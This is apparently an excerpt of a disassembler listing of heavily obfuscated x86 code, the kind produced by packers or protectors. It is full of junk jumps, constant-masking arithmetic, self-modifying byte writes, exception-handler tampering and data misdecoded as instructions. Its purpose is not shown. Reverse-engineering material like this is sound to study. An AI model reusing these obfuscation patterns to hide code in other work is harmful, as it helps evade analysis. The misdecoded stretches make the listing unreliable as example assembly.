		dd 0AE0E6800h, 9E90048h, 0E8FFFFFDh, 0FFFFDF0Dh
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B33B:				; CODE XREF: _3gijy9nr:0048AD54j
		jmp	loc_48C084
; ---------------------------------------------------------------------------
		dd 1B689C00h, 87CBC322h, 0C18B240Ch, 76E88159h,	811CD820h
		dd 4B3226F0h, 12C0C195h, 0FFE323E9h
		db 0FFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_568. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_488888

loc_48B362:				; CODE XREF: sub_488888+4C9Fj
		jmp	loc_48A5C8
; END OF FUNCTION CHUNK	FOR sub_488888
; ---------------------------------------------------------------------------
		align 4
		dd 15DAE900h, 0
; ---------------------------------------------------------------------------

loc_48B370:				; CODE XREF: _3gijy9nr:0048AD7Fj
		jmp	locret_48A36E
; ---------------------------------------------------------------------------
		align 2

loc_48B376:				; CODE XREF: _3gijy9nr:00488E36j
		jmp	loc_4893E6
; ---------------------------------------------------------------------------
		pop	edx
		sub	edx, 892A6BF1h
		and	edx, 1F8B367Fh
		sub	edx, 0FFFE6AE1h
		xor	edx, 4EAEA0A1h
		add	edx, ebp
		add	edx, 0AB50F441h
		jmp	loc_48BCF1
; ---------------------------------------------------------------------------
		align 2
		dw 0C3C1h
		dd 98E38113h, 0F77E4CFBh, 40000C3h, 0EC94E900h
		db 2 dup(0FFh),	0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_583. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_48B3B8:				; DATA XREF: sub_48B429+10o
		xchg	edx, [esp]
		jmp	loc_488B12
; ---------------------------------------------------------------------------
		push	offset unk_488B07
		jmp	locret_488B06
; ---------------------------------------------------------------------------
		align 4
		pop	large dword ptr	fs:0
		add	esp, 4
		jmp	loc_48C0F8
; ---------------------------------------------------------------------------
		align 4
		dd 0C8926800h, 0CDE90048h, 18h,	0E91BEBC1h, 0FFFFF7B0h
		dd 0D975820Fh, 487FFFFh, 0C0315824h, 48C8CD68h,	14C5E900h
		dd 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C67D

loc_48B408:				; CODE XREF: sub_48C67D+5E0j
		jz	loc_48C68E
		jmp	loc_48D819
; END OF FUNCTION CHUNK	FOR sub_48C67D
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48C67D

loc_48B414:				; CODE XREF: sub_48B609:loc_48905Dj
					; sub_48C67D:loc_48CC4Dj
		call	loc_48B870
; END OF FUNCTION CHUNK	FOR sub_48C67D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_580. PRESS KEYPAD	"+" TO EXPAND]
		align 4
		jmp	locret_48C5D6
; ---------------------------------------------------------------------------

loc_48B421:				; CODE XREF: _3gijy9nr:loc_48B556j
		xchg	eax, ebp
		jmp	loc_48DAD6
; ---------------------------------------------------------------------------
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48B429	proc near		; CODE XREF: sub_48B609:loc_48BD80j
					; sub_48B609:loc_48D75Dp

; FUNCTION CHUNK AT 0048A206 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		xchg	ecx, [esp+0]
		mov	ebx, ecx
		pop	ecx
		add	edx, 80AB1159h
		cdq
		push	offset loc_48B3B8
		jmp	loc_48A206
sub_48B429	endp

; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48B444:				; CODE XREF: sub_48B609:loc_48B1F9j
		call	sub_48A85B
		push	edx
		mov	edx, offset unk_488AE5
		jmp	loc_48C23A
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D95C

loc_48B455:				; CODE XREF: sub_48D95C+8j
		pop	edx
		pushf
		push	0EDF4137Bh
		xchg	esi, [esp+4+var_4]
		mov	edi, esi
		pop	esi
		add	edi, 0B8E979B6h
		rol	edi, 19h
		jmp	loc_48D2C2
; END OF FUNCTION CHUNK	FOR sub_48D95C
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B472:				; CODE XREF: _3gijy9nr:0048A684j
		xchg	esi, [esp]
		pop	esi
		push	esi
		mov	esi, offset loc_48B0EA
		jmp	near ptr word_4897D6+1
; ---------------------------------------------------------------------------
		mov	byte ptr [edx],	85h
		pop	edx
		push	0B5208302h
		xchg	eax, [esp]
		and	esi, 4A336643h
		jmp	loc_48DD26
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

locret_48B499:				; CODE XREF: _3gijy9nr:loc_48A9DFj
		retn
; ---------------------------------------------------------------------------
		align 4
		add	ecx, ebp
		push	ebx
		push	91D5C3A1h
		pop	ebx
		sub	ebx, 0B1647E42h
		or	ebx, 3DD4AFE7h
		sub	ebx, 5DEDA627h
		xor	ebx, 15DE87BEh
		jmp	loc_4897EB
; ---------------------------------------------------------------------------
		dw 8B00h
; ---------------------------------------------------------------------------
		sti
		pop	ebx
		call	sub_48E122
		nop
		jmp	loc_48CA12
; ---------------------------------------------------------------------------
		db 2 dup(0), 23h
; ---------------------------------------------------------------------------
		inc	byte ptr [ecx+239805C6h] ; CODE	XREF: _3gijy9nr:0048DF43j
		aaa
		xchg	esi, [esp]
		jmp	loc_48BEB5
; ---------------------------------------------------------------------------
		align 4
		db 51h,	68h
; ---------------------------------------------------------------------------

loc_48B4E6:				; CODE XREF: _3gijy9nr:loc_48B51Aj
		add	eax, 0E9B4C571h
		dec	esp
		aam	0FFh
		call	dword ptr [ebx-75h]
		fiadd	dword ptr [edi+60BA241Ch]
; ---------------------------------------------------------------------------
		db 8Eh
; ---------------------------------------------------------------------------
		dec	eax
		add	cl, ch
		cmp	bh, 0FFh
		inc	dword ptr [eax]

locret_48B500:				; CODE XREF: _3gijy9nr:0048DBF4j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C7C0

loc_48B501:				; CODE XREF: sub_48C7C0+Aj
		jmp	locret_48BECA
; END OF FUNCTION CHUNK	FOR sub_48C7C0
; ---------------------------------------------------------------------------
		sub	ebx, 4730BF82h
		jmp	sub_48CA72
; ---------------------------------------------------------------------------
		db 68h,	7Bh, 63h
		dd 815F2ECFh
; ---------------------------------------------------------------------------
		imul	dword ptr [edi]

loc_48B51A:				; CODE XREF: _3gijy9nr:0048B548j
		ja	short loc_48B4E6
		add	al, [ecx-8516811h]
		lodsb
		jns	loc_48DC4D
		add	cl, ch
		jnb	short loc_48B532
; ---------------------------------------------------------------------------
		db 3 dup(0)
		db 0, 0C1h
; ---------------------------------------------------------------------------

loc_48B532:				; CODE XREF: _3gijy9nr:0048B52Bj
		call	near ptr 275B9E52h
; ---------------------------------------------------------------------------
		db 0
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B53A:				; CODE XREF: _3gijy9nr:0048A559j
		xor	eax, 0C8B8B756h
		add	eax, 0D4972FB6h
		mov	eax, [eax]
		jl	short loc_48B51A
		jz	loc_48AE82
		push	ebx
		call	near ptr loc_48A435+1

loc_48B556:				; CODE XREF: _3gijy9nr:0048AB19j
		jmp	loc_48B421
; ---------------------------------------------------------------------------

loc_48B55B:				; CODE XREF: _3gijy9nr:0048D249j
		xchg	edx, [esp]
		pop	edx
		push	eax
		mov	eax, edx
		jmp	loc_48B158
; ---------------------------------------------------------------------------
		push	5895F669h
		xchg	eax, [esp]
		xchg	esi, [esp]
		mov	eax, esi
		pop	esi
		mov	byte ptr [edx],	87h
		pop	edx
		jmp	loc_48CD02
; ---------------------------------------------------------------------------
		align 10h

loc_48B580:				; CODE XREF: _3gijy9nr:00488E84j
		test	eax, eax
		jz	loc_48AD73
		pop	large dword ptr	fs:0
		add	esp, 4
		jmp	loc_48D4AC
; ---------------------------------------------------------------------------
		and	ecx, ebx
		jmp	loc_48D10C
; ---------------------------------------------------------------------------
		dw 3C6h
		dd 98BF5B9Ch, 0E90048C7h, 0FFFFFA50h
; ---------------------------------------------------------------------------
		xchg	edx, edi

; =============== S U B	R O U T	I N E =======================================



sub_48B5AE	proc near		; CODE XREF: sub_48A83A+8p

; FUNCTION CHUNK AT 00488F77 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00489FF2 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0048AE92 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048B085 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	60CF4535h
		pop	ecx
		sub	ecx, 0F7147AD8h
		push	ecx
		jmp	loc_48AE92
sub_48B5AE	endp

; ---------------------------------------------------------------------------
		dd 6C60000h, 0C15E5EC7h, 0F6811BC6h, 45E4CF5Bh,	715DCE81h
		dd 0E681EE47h, 73DF6274h, 4FFE9h
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_488F35

loc_48B5E6:				; CODE XREF: sub_488F35+646j
		push	0FC7BB0B6h
		push	edi
		mov	edi, offset loc_48DCD6
		jmp	loc_48A88F
; END OF FUNCTION CHUNK	FOR sub_488F35
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CE8D

loc_48B5F6:				; CODE XREF: sub_48CE8D:loc_48DCA4j
		push	offset loc_489510
		jmp	locret_48BA8C
; END OF FUNCTION CHUNK	FOR sub_48CE8D
; ---------------------------------------------------------------------------
		dd 0E917CBC1h, 0FFFFF8E7h
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48B609	proc far		; CODE XREF: sub_48DF6B:loc_48CFA1p

var_5C		= dword	ptr -5Ch
var_54		= dword	ptr -54h
var_4C		= dword	ptr -4Ch
var_3C		= dword	ptr -3Ch
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 00488D95 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00488E71 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048905D SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0048924B SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004892F2 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00489419 SIZE 00000039 BYTES
; FUNCTION CHUNK AT 00489630 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004896AE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0048972E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00489943 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00489A43 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00489AC7 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00489C3A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00489CB2 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00489EAB SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00489EEC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00489EF8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00489F20 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00489F69 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00489F75 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00489FAC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048A12F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048A199 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048A1F0 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048A228 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0048A25F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048A2BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A378 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A47F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048A4A3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048A4C9 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0048A4EE SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0048A68A SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0048A6D0 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0048A6E8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0048A834 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0048A930 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048AA03 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0048ABF4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048AD1C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0048AD95 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0048AE16 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048AE82 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048AE9D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048AF3B SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0048AF94 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0048AFCC SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0048AFDF SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0048B14C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048B166 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048B173 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0048B1F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048B270 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0048B2BE SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0048B444 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048C0C1 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0048C14C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0048C170 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048C198 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0048C19F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C215 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C23A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0048C257 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0048C27D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C29A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048C44C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0048C507 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048C532 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C554 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0048C5D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C6D5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048C6F1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048C763 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0048C7E7 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048C815 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C8C1 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0048C901 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0048C941 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CA9E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048CAC4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CB43 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0048CBC5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048CBF8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CC24 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048CC63 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048CCCF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CD4E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CDC8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0048CE15 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048CE4D SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0048CE67 SIZE 00000001 BYTES
; FUNCTION CHUNK AT 0048CED5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048CF2D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0048CFC9 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 0048CFF5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D07F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048D0B6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048D24E SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0048D2F2 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048D35A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048D40C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048D457 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0048D4A4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D4FA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0048D551 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D613 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0048D75D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D7B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D7F4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D848 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0048D898 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048D8DF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D8FB SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0048D976 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D986 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DA4F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DA55 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DA6C SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0048DB6F SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0048DB9F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048DBD1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048DBF9 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0048DC5F SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0048DC87 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DC9F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DCFD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DD98 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0048DE35 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DE75 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0048DEC5 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0048DF8C SIZE 00000017 BYTES

		xchg	edx, [esp+8+var_8]
		pop	edx
		mov	byte ptr [edx],	0Fh
		pop	edx
		push	offset loc_48A84E
		jmp	loc_48C03F
; ---------------------------------------------------------------------------
		db 68h
		dd 6951AB36h, 0FFDE99E9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B627:				; CODE XREF: _3gijy9nr:loc_48D784j
		push	offset loc_48BBC3
		jmp	loc_48A378
; ---------------------------------------------------------------------------
		db 2 dup(0), 89h
		db 3Ah
; ---------------------------------------------------------------------------

loc_48B635:				; CODE XREF: _3gijy9nr:loc_4897E6p
		xchg	edx, [esp+8+var_8]
		pop	edx
		mov	byte ptr [ebx],	87h
		xchg	ecx, [esp+4+var_4]
		mov	ebx, ecx
		pop	ecx
		push	ecx
		jmp	loc_488E71
; ---------------------------------------------------------------------------
		dd 8B241C87h, 0FE8B57CBh, 68243C87h, 4D21A4Eh, 0FFF46EE9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

locret_48B65F:				; CODE XREF: _3gijy9nr:0048A367j
		retn
; ---------------------------------------------------------------------------
		dd 243C8700h, 41685E5Fh, 0E90048B3h, 43h
; ---------------------------------------------------------------------------

loc_48B670:				; CODE XREF: _3gijy9nr:0048A95Ej
		sub	eax, 55F147C3h
		add	eax, 9635FFFAh
		jmp	near ptr dword_489AEC+3
; ---------------------------------------------------------------------------
		db 2 dup(0), 81h
		dd 0B5FDC4FBh, 22C6E92Ah, 81000000h, 0FBAC8BFBh, 227DE994h
		dd 0
; ---------------------------------------------------------------------------
		shr	edi, 0Bh

loc_48B69F:				; CODE XREF: sub_48B609+1812j
		xor	edi, 0F68C7861h
		push	esi
		mov	esi, offset loc_48AD89
		jmp	loc_489F20
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		align 2
		retn
; ---------------------------------------------------------------------------
		jmp	nullsub_586
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48B6B9:				; CODE XREF: _3gijy9nr:0048B264j
		mov	byte ptr [ebx],	0C7h
		pop	ebx
		pop	edi
		push	edi
		mov	edi, ebp
		xchg	edi, [esp+4+var_4]
		mov	ebp, esp

loc_48B6C6:				; CODE XREF: _3gijy9nr:0048A4E8j
		add	esp, 0FFFFFFC8h
		jmp	loc_48BED0
; ---------------------------------------------------------------------------
		align 10h

loc_48B6D0:				; CODE XREF: _3gijy9nr:0048A580j
		call	sub_489E9B
		add	dh, al
		add	al, [ebx]
		pop	edx
		call	sub_48CFAC
		add	[eax+9], ch
		lodsd
		dec	eax
		add	cl, ch
		out	0Ch, al		; DMA controller, 8237A-5.
					; clear	byte pointer flip-flop.
; ---------------------------------------------------------------------------
		dd 0
; ---------------------------------------------------------------------------

loc_48B6EC:				; CODE XREF: sub_489C99+12j
		sub	ebx, 95EE4159h
		rol	ebx, 2
		xor	ebx, 8AEFDA3Ah
		popf
		add	eax, ebx
		pop	ebx
		push	edx
		jmp	loc_48A930
; ---------------------------------------------------------------------------
		align 2

locret_48B706:				; CODE XREF: _3gijy9nr:0048DD71j
		retn
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------

loc_48B709:				; CODE XREF: sub_48B609:loc_48DB9Fj
		or	edx, 3B9CA067h
		jnz	loc_48D75D
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B717:				; CODE XREF: sub_48CA72+8j
		jmp	loc_48A6D0
; ---------------------------------------------------------------------------
		dd 0D6810000h, 4A4EE62Ch, 0E95FE88Bh, 0FFFFE562h, 6804C483h
		dd 5CA02A50h, 8B243C87h, 0FDECE9C7h
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------

locret_48B73F:				; CODE XREF: _3gijy9nr:loc_48DC8Dj
		retn
; ---------------------------------------------------------------------------

loc_48B740:				; CODE XREF: _3gijy9nr:0048C88Dj
		jmp	near ptr dword_489BEC+23h
; ---------------------------------------------------------------------------
		align 2

loc_48B746:				; CODE XREF: sub_48B609:loc_48C0C1j
					; sub_48B609:loc_48C941j
		xor	eax, 5E748A2Ah
		cmp	esi, eax
		pop	eax
		jmp	loc_48D35A
; ---------------------------------------------------------------------------
		dd 0EFC78100h, 68FD89B1h, 48C0A8h, 0FFD9F6E9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_48B765:				; CODE XREF: sub_48B609:loc_48C6D5p
		xchg	eax, [esp+30h+var_30]
		xchg	edx, [esp+30h+var_30]
		mov	eax, edx
		pop	edx
		push	esi
		pushf
		jmp	near ptr loc_489443+1
; ---------------------------------------------------------------------------
		align 2
		retn
; ---------------------------------------------------------------------------
		jmp	loc_48CBC5
; ---------------------------------------------------------------------------
		dd 106E900h		; CODE XREF: sub_48B609+1555j
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B782:				; CODE XREF: _3gijy9nr:loc_489D75j
					; DATA XREF: _3gijy9nr:0048CA25w
		jmp	nullsub_580
; ---------------------------------------------------------------------------
		db 0E9h
		dd 0FFFFE7B4h
		db 0
; ---------------------------------------------------------------------------

loc_48B78D:				; CODE XREF: _3gijy9nr:loc_48DF4Ej
		mov	esi, offset loc_4892CA
		jmp	loc_48B1F9
; ---------------------------------------------------------------------------

loc_48B797:				; CODE XREF: _3gijy9nr:loc_48CE7Cp
		xchg	edx, [esp+0]
		pop	edx
		add	edi, 9B564224h
		push	4891D6h
		jmp	nullsub_575
; ---------------------------------------------------------------------------
		align 4
		mov	[ebx], esi
		xchg	eax, [ebp+0]
		jz	loc_48D370
		and	ebx, 0C11DD527h
		sub	edx, 0DC206051h
		xor	edx, 7830B94Bh
		jmp	loc_489EEC
; ---------------------------------------------------------------------------
		rol	edx, 2
		xor	edx, 3DB274BCh
		and	edx, 5F23462Ah
		add	edx, 0F927677Ch
		jmp	loc_48DA55
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B7EA:				; CODE XREF: _3gijy9nr:00489522j
		push	offset loc_48BAF9
		jmp	loc_48D976
; ---------------------------------------------------------------------------
		pop	eax
		push	edx
		mov	edx, 48AF57h
		jmp	loc_48C5D7
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 0B8h, 23h, 0E3h
; ---------------------------------------------------------------------------
		retf	811Dh
; ---------------------------------------------------------------------------
		db 0E6h
		dd 44B38C5h, 9930C681h,	3487003Ah, 0D624h, 48DE2168h, 0FF1E900h
		dd 0
; ---------------------------------------------------------------------------

loc_48B824:				; CODE XREF: _3gijy9nr:loc_48D98Dj
		mov	byte ptr [edi],	9
		pop	edi
		or	eax, 0D43ABE9Bh
		add	eax, 2C0DE1D3h
		xchg	eax, [esp+0]
		push	edx
		call	near ptr dword_489E2C+26h
		add	cl, ch
		das
		sar	edi, cl
		inc	dword ptr [eax]
		add	cl, al
		jmp	far ptr	0:0CF2E913h
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B84F:				; DATA XREF: _3gijy9nr:0048A93Bo
		add	esi, 7A34D686h
		push	ebx
		push	0F22C4B5Fh
		pop	ebx
		xor	ebx, 96823FA8h
		or	ebx, 52D29B37h
		rol	ebx, 6
		jmp	loc_48D46D
; ---------------------------------------------------------------------------

loc_48B870:				; CODE XREF: sub_48C67D:loc_48B414p
		xchg	edi, [esp+3Ch+var_3C]
		xchg	esi, [esp+3Ch+var_3C]
		mov	edi, esi
		pop	esi
		jno	loc_4892F2
		mov	edx, [eax]
		jmp	loc_489A43
; ---------------------------------------------------------------------------
		align 4
		push	edi
		push	151ED4CAh
		pop	edi
		sub	edi, 0BCB57B4Fh
		xor	edi, 58695973h
		jmp	loc_48D7B2
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

locret_48B8A1:				; CODE XREF: _3gijy9nr:0048A71Ej
					; DATA XREF: sub_48D1F6-3034o
		retn	0Ch
; ---------------------------------------------------------------------------
		dd 638E900h, 0E9000000h, 0FFFFF942h
		db 0
; ---------------------------------------------------------------------------

loc_48B8B1:				; CODE XREF: sub_48B609+697j
		jmp	loc_489C3A
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

locret_48B8B7:				; CODE XREF: sub_48B609+86Aj
					; sub_48D620+7j
					; DATA XREF: ...
		retn
; ---------------------------------------------------------------------------
		mov	esi, offset loc_48C997
		jmp	loc_48DA4F
; ---------------------------------------------------------------------------
		align 4
		dd 86C8815Bh, 8130D418h, 7DEDDBE0h, 0E58DE8D4h,	0FFFFh
; ---------------------------------------------------------------------------

loc_48B8D8:				; CODE XREF: sub_48B609+149Aj
		jmp	nullsub_579
; ---------------------------------------------------------------------------
		align 2

loc_48B8DE:				; CODE XREF: sub_48B609+54Dj
		jmp	loc_48CFF5
; ---------------------------------------------------------------------------
		align 4
		dd 0FFF99DE9h
		db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B8EB:				; CODE XREF: sub_48B609+93Cj
		cmp	ecx, 5C433630h
		jmp	loc_48AFCC
; ---------------------------------------------------------------------------
		dw 0C600h
		dd 56589C00h, 1D5CE89Ch
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48B902:				; CODE XREF: _3gijy9nr:0048D842j
		jmp	near ptr dword_489AB0+5
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------

loc_48B909:				; CODE XREF: _3gijy9nr:loc_4896E4j
		add	esi, 0E5CB0CC8h
		add	esi, ebp
		add	esi, 479F1C57h
		mov	[esi], eax
		push	offset loc_48975D
		jmp	loc_48D4A4
; ---------------------------------------------------------------------------
		align 4
		dd 0B0E88100h, 0E83B3A64h, 2068h, 0D8E9h
		db 0
; ---------------------------------------------------------------------------

loc_48B935:				; CODE XREF: sub_48CA8E:loc_48CA98j
		rol	ecx, 6
		add	ecx, 693AA55Dh
		xor	ecx, 0DD1334EFh
		add	ecx, 0FD5EE9DBh
		jmp	loc_48AFDF
; ---------------------------------------------------------------------------
byte_48B94F	db 52h			; DATA XREF: _3gijy9nr:0048C671o
		dd 0A976852h, 0C15ACF67h, 0F2810CC2h, 762729F9h, 0C845EA81h
		dd 84E9F734h, 0FFFFECh,	9D01C600h, 8B243487h, 0C4835ECEh
		dd 984A6804h, 91E90048h, 0FFFFF7h, 81B76800h, 34A13404h
